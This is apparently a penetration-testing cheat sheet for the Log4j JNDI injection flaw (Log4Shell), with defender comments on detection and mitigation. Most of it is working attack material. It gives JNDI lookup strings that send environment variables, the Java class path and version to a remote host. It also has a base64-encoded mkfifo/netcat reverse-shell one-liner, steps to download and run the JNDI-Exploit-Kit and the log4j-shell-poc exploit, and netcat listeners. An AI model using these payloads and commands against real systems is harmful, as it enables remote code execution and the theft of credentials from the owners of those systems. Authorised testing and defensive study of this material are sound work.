Log4j
Test payload
## Purpose: check whether a logged, user-controlled field reaches a Log4j build that
## still resolves JNDI lookups. Each ${jndi:...} line below is a test string, not a
## shell command; a connection arriving at the listener means the lookup was evaluated.
## Defender view: these strings appear in request/application logs, and the callback is
## an outbound LDAP connection from the application host. Both are detection points, and
## egress filtering of LDAP from application servers blocks the callback.
## ------------------| Run netcat listener
## -l listen, -v verbose, -n no DNS resolution, -p 4545 local port.
nc -lvnp 4545
## ------------------| Payload
## Fixed path: only shows that a callback happens.
${jndi:ldap://<HOSTIP>:4545/h4rithd}
## Nested lookups (java:os, env:<NAME>, java:version, sys:<property>) are placed in the
## LDAP URL path, so a vulnerable logger discloses those values to the remote host.
## Environment variables and the class path can hold credentials and internal paths;
## treat anything captured here as sensitive.
${jndi:ldap://<HOSTIP>:4545/${java:os}}
${jndi:ldap://<HOSTIP>:4545/${env:ftp_user}}
${jndi:ldap://<HOSTIP>:4545/${java:version}}
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}}
## Several lookups in one request, separated by "...." so the values can be told apart.
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}....${java:version}....${java:os}}
## ------------------| Listener on the default LDAP port (389) with a canned reply
## Sends one fixed binary reply to the connecting client and hex-dumps (xxd) whatever
## the client sends. Binding port 389 normally requires root.
## NOTE(review): the bytes look like a minimal LDAP bind-success response, which would
## let the client continue to the request that carries the URL path -- confirm.
echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -nvv -l -p 389 | xxd
## No port in the URL, so the client uses the LDAP default, matching the listener above.
${jndi:ldap://<HOSTIP>/${java:os}}
${jndi:ldap://<HOSTIP>/${java:version}}
${jndi:ldap://<HOSTIP>/${sys:java.class.path}}
Exploit I
## ------------------| Step 0x01
## Fetches a prebuilt JAR from the master branch of a third-party repository with no
## pinned commit and no checksum. The file can change between downloads; run it only in
## an isolated, disposable VM and record its hash for the engagement notes.
wget https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
## ------------------| Step 0x02
## Base64-encodes a named-pipe reverse-shell one-liner; -w 0 disables line wrapping so
## the output is a single string (used as <base64> in the last line of this section).
## Detection: a Java process spawning /bin/sh, mkfifo under /tmp and nc is a
## high-signal process-lineage indicator on the target host.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HOSTIP> 4545 >/tmp/f' | base64 -w 0
## ------------------| Step 0x03
## Starts the kit on the testing host.
## NOTE(review): -L presumably sets the LDAP listener address:port -- confirm with the
## tool's own help output.
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L <HOSTIP>:1389
## ------------------| Step 0x04
## Listener for the connection made by the Step 0x02 command (port 4545).
nc -lvnp 4545
## Test string submitted to the logged field; it points at the kit's LDAP port (1389)
## and carries the Step 0x02 output in place of <base64>.
## Mitigation: upgrade Log4j to a release with JNDI lookups disabled, and deny outbound
## LDAP/RMI from application servers so the lookup cannot reach an external host.
${jndi:ldap://<HOSTIP>:1389/serial/CommonsCollections5/exec_unix/<base64>}
Exploit II
## ------------------| Step 0x01
## Clones a third-party proof-of-concept and installs its Python dependencies. Both run
## unreviewed code on the testing host: use an isolated VM and a virtualenv, and read
## poc.py and requirements.txt before executing anything.
git clone https://github.com/kozmer/log4j-shell-poc && cd log4j-shell-poc
pip3 install -r requirements.txt
## ------------------| Step 0x02
## For this to work, the extracted Java archive has to be named jdk1.8.0_20 and be in
## the same directory.
## Download Java from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
tar -xvf jdk-*.tar
## The glob must match exactly one entry for this to be a plain rename; check the
## directory first if more than one JDK archive has been extracted there.
mv jdk1* jdk1.8.0_20
## If your target is Windows, edit poc.py to use cmd.exe.
## ------------------| Step 0x03
## Listener on port 4545, matching --lport below.
nc -lvnp 4545
## NOTE(review): --webport presumably sets the port of the PoC's own web server and
## --userip (<LIP>) the testing host's IP address -- confirm against poc.py.
## Detection on the target side: outbound LDAP followed by an HTTP fetch from the same
## Java process to the same external host.
python3 poc.py --webport 8000 --lport 4545 --userip <LIP>